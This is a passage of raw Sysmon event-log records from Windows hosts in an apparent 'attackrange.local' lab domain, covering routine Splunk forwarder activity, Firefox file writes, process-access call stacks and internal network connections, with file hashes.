Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.594{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DBF7D84695EC2AD038CC192CDE804B14,SHA256=8C592A661A23E14AA1FC8175FB9D706319D61EAB3D01865A3B6743974F3D363B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=505F1747F4F51F2525619F766AEE12AE,SHA256=F3496DB0B27B186110F1EC85F99C76F77CF50C99CC1D39BA74C253C509DA1E67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=29BD216D498F41656977A6703D0C1875,SHA256=B4056BF33C0B5BBCC45A942AAA61DC8F428DCD62E6D1009FB8CB94AF79F2685C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=258CA4FA98930E55679EE855F449D8CF,SHA256=2141406EFE53BF3B035705960C08124FBE235CF8D8C0B52EC4122E4FBF009E3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=554FB01AE03220BE11DEDDACB4AD80D6,SHA256=C437483059B5CE8D54FB729C7E0CF010315372BCDF56FF8C5D20D2AE1670929E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4AAD769E16DCEC499CCD013EC58C3092,SHA256=7EF455E87B220EEDCA31F306549E54259EF6E6FCA7F053EEE54F06884E289847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9BBA6746BE60652408F1B4F21CCCB7A9,SHA256=062EAE80BDD5F96C851B9E7B72A7D582E7CD0A6FC4287DFDDFCEACCBA0BBC624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=10EBED91417B31888BF10C740C6673A3,SHA256=19F97108432F5ECB1DFBBB20E7179042AF5E3EE4DE0E1E7F7EC63AE5B006B2E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE7D2737073FE52149B5F85FF81AB6C4,SHA256=8783AC33C99D99FF6C025C0425D2980E7F77EC0271E681393F09A8C844FD889C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=51A91CC51EEDE4421F5C6A5DCA937C1B,SHA256=E8B2641C2D32F11905A59DD779F65112E6791117D46CC0720F8A8614D6137BFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C2B8711949AB25B1E702DB9CE573CCAB,SHA256=DDE98E2C37897771403A7E81D09B36213D28E5EF4AA5737E8F702E284C5DF1F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.099{466BC892-F36C-60EB-027D-00000000CF01}386410176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.046{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED6EB7765836A2C132DD6962A3B8CEE0,SHA256=A41F375A620105E9D3412C2BE7DD1B39286C3ECB2DD41E253A8E977388D46E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:54.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CDEDF10EB49133D95327880D42094D9,SHA256=7E44B2100403BB6EC7305324E365C6E7C7D9961E4C1EB1A566BAEB62A2675393,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:46.746{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50945-false10.0.1.12-8000- 10341000x80000000000000001046818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.279{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:54.263{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.264{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.063{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF137B5579B4499F713B1992131E8DB4,SHA256=A0A44D3CD69352C058AE0B345F1354BEFA8633D5D1C9878F91674F3C0EB427A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:55.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5765694CE7F4FB67D31BCEF68141FAD8,SHA256=355E7139ECB330B704A65AB1EA9FA281FAA9A8D55E11FD4E9A27BB39F5675699,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:55.477{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001046821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:55.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E4EC8D511263FF309F93133E5C5F6F5,SHA256=8A71CD7060485E73B932B6A353D9C66F511B9EF309BC60E9A9F3334C836A2F70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:55.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD444D25E2B3337020EC381426B1BF31,SHA256=D944ACD750B2478771ECACB5B0AB03D7EA5B423B821498EA456FB0A8B825B013,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:53.383{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57194-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:56.491{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5B19CD291A61788855739C4F19B502F,SHA256=412F9B8BA192B2BDEF0FB5F856795787D6E9239493067A8CBD1DFE09534FD7F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:56.813{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:49.031{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50946-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 
354300x80000000000000001046825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:49.031{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50946-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001046824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:56.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21B1BC3003397E4DEC2C3E102290B215,SHA256=8453FAAD31E1DBC1583356240EA63C671EEF9528675ADBE50B64E1EFB8A8C3EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:56.130{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08140E561B6D7F3196EF92AAF5736EDC,SHA256=4BF72C9695842D27609C769D806F582C3449A3984E902D5812813052B58A423E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:57.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=396345C5371DE500958864C741976EAA,SHA256=708A0015944A0495CF30AB2EF1A2BCC43BDE56C49C8F6C4E9C35E63EE19184F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:57.144{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DA732B9A1BA8B8852B39BED568D7285,SHA256=7D79161EB2F5955E35F06748510710AB162E50B345D38CC9928F4484B88724CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:58.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6766566793F8D6609DB589DFF5B583,SHA256=26100CB5A5BDA6F358D3801444A772773833CD72F86057EBA1490075A30FFD7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.347{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50947-false10.0.1.12-8089- 23542300x80000000000000001046830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:58.160{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE26D65AF0CF318C27D3D10761E39468,SHA256=563C79283921760DEC92BFB116D82DB6B605502CAAB8E3BC6D530E83A05C5EA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
